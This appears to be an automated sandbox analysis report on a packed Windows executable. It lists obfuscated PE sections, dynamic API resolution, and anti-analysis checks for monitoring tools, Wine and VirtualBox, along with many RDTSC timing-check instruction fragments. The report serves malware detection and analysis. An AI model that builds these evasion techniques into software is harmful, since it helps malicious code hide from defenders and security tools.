Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1821184 > 1048576
Source: file.exe | Static PE information: Raw size of woldotvo is bigger than: 0x100000 < 0x1a2c00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;woldotvo:EW;cpkeohyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;woldotvo:EW;cpkeohyv:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1caf36 should be: 0x1c4095
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: woldotvo
Source: file.exe | Static PE information: section name: cpkeohyv
Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080C087 push 1AFE69DFh; mov dword ptr [esp], ebp0_2_0080C0EA
              Source: file.exe Static PE information: section name: woldotvo entropy: 7.953105657448845

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004F6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A7478 second address: 8A748E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F052CEB1F1Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3247 second address: 8E3250 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3505 second address: 8E350B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5508 second address: 8E5519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Ch 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E350B second address: 8E350F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6403 second address: 8E6415 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F052CBC210Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E350F second address: 8E351D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6415 second address: 8E6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 jc 00007F052CBC210Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E351D second address: 8E3521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3521 second address: 8E352B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E82CC second address: 8E82D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E352B second address: 8E352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E82D6 second address: 8E832F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F052CEB1F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F052CEB1F18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D2629h], eax 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D2958h] 0x00000033 push 00000000h 0x00000035 mov bx, BCAAh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F052CEB1F25h 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA1F9 second address: 8EA203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA203 second address: 8EA20D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F052CEB1F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA20D second address: 8EA217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA217 second address: 8EA21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8458 second address: 8E8465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8465 second address: 8E8469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA21B second address: 8EA240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2110h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007F052CBC2112h 0x00000012 jnp 00007F052CBC210Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8469 second address: 8E8473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA760 second address: 8EA764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA764 second address: 8EA768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB798 second address: 8EB79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC86A second address: 8EC8E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F052CEB1F18h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F052CEB1F1Eh 0x0000002b mov edi, 6418ADD7h 0x00000030 push 00000000h 0x00000032 mov edi, 1F1C672Ah 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F052CEB1F18h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 pushad 0x00000054 xor ebx, dword ptr [ebp+122D1A4Fh] 0x0000005a mov edx, 2B758E45h 0x0000005f popad 0x00000060 xchg eax, esi 0x00000061 push ebx 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC8E7 second address: 8EC8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F052CBC2106h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0805 second address: 8F0809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0809 second address: 8F0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1E3A second address: 8F1E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2DF7 second address: 8F2DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F10F0 second address: 8F10F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3D62 second address: 8F3DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F052CBC2108h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f mov bl, cl 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F052CBC2108h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F052CBC2108h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov bx, B8E0h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 jmp 00007F052CBC2114h 0x00000057 pop eax 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC140 second address: 8FC147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC147 second address: 8FC14D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC14D second address: 8FC151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9008D4 second address: 9008D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9008D8 second address: 9008F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F052CEB1F25h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895A56 second address: 895A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFFB8 second address: 8FFFC8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F052CEB1F16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFFC8 second address: 8FFFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90011F second address: 90015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jbe 00007F052CEB1F16h 0x00000012 jmp 00007F052CEB1F29h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edi 0x0000001b jmp 00007F052CEB1F1Bh 0x00000020 pop edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90015D second address: 900163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9002B0 second address: 9002BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F052CEB1F16h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900411 second address: 90041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F052CBC2106h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90041E second address: 90042B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F052CEB1F18h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90042B second address: 900439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F052CBC2106h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9049C2 second address: 9049CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F052CEB1F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9049CC second address: 9049EA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edi 0x00000010 jmp 00007F052CBC210Ah 0x00000015 pop edi 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904ADD second address: 904AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904AE3 second address: 904AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8909B2 second address: 8909B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8909B6 second address: 8909FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F052CBC2117h 0x0000000d jno 00007F052CBC210Ch 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jng 00007F052CBC2106h 0x0000001d jc 00007F052CBC2106h 0x00000023 push esi 0x00000024 pop esi 0x00000025 popad 0x00000026 push ebx 0x00000027 jnp 00007F052CBC2106h 0x0000002d pop ebx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8909FC second address: 890A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F25h 0x00000007 push edi 0x00000008 jng 00007F052CEB1F16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90972E second address: 909734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909734 second address: 909738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909BDF second address: 909C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F052CBC2118h 0x0000000e jmp 00007F052CBC210Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909C0F second address: 909C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F052CEB1F16h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D59 second address: 909D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC210Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D69 second address: 909D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D6D second address: 909D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F052CBC2116h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D82 second address: 909D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A1CF second address: 90A1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2116h 0x00000009 js 00007F052CBC2106h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A1EF second address: 90A1F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A1F9 second address: 90A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A203 second address: 90A207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A4E0 second address: 90A4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A65B second address: 90A663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A7A4 second address: 90A7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push edi 0x00000009 js 00007F052CBC2121h 0x0000000f jmp 00007F052CBC2115h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BA28 second address: 88BA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F052CEB1F26h 0x0000000c jmp 00007F052CEB1F24h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F303 second address: 90F307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F307 second address: 90F32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F052CEB1F16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F5B3 second address: 90F5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F5B9 second address: 90F5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F5C3 second address: 90F5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F6EB second address: 90F709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F25h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F709 second address: 90F70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F70D second address: 90F754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F27h 0x00000007 jmp 00007F052CEB1F1Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jnp 00007F052CEB1F4Eh 0x00000015 jmp 00007F052CEB1F27h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F754 second address: 90F76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2113h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8E8 second address: 90F8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8EE second address: 90F8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90FB87 second address: 90FB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F052CEB1F1Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D544 second address: 88D54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
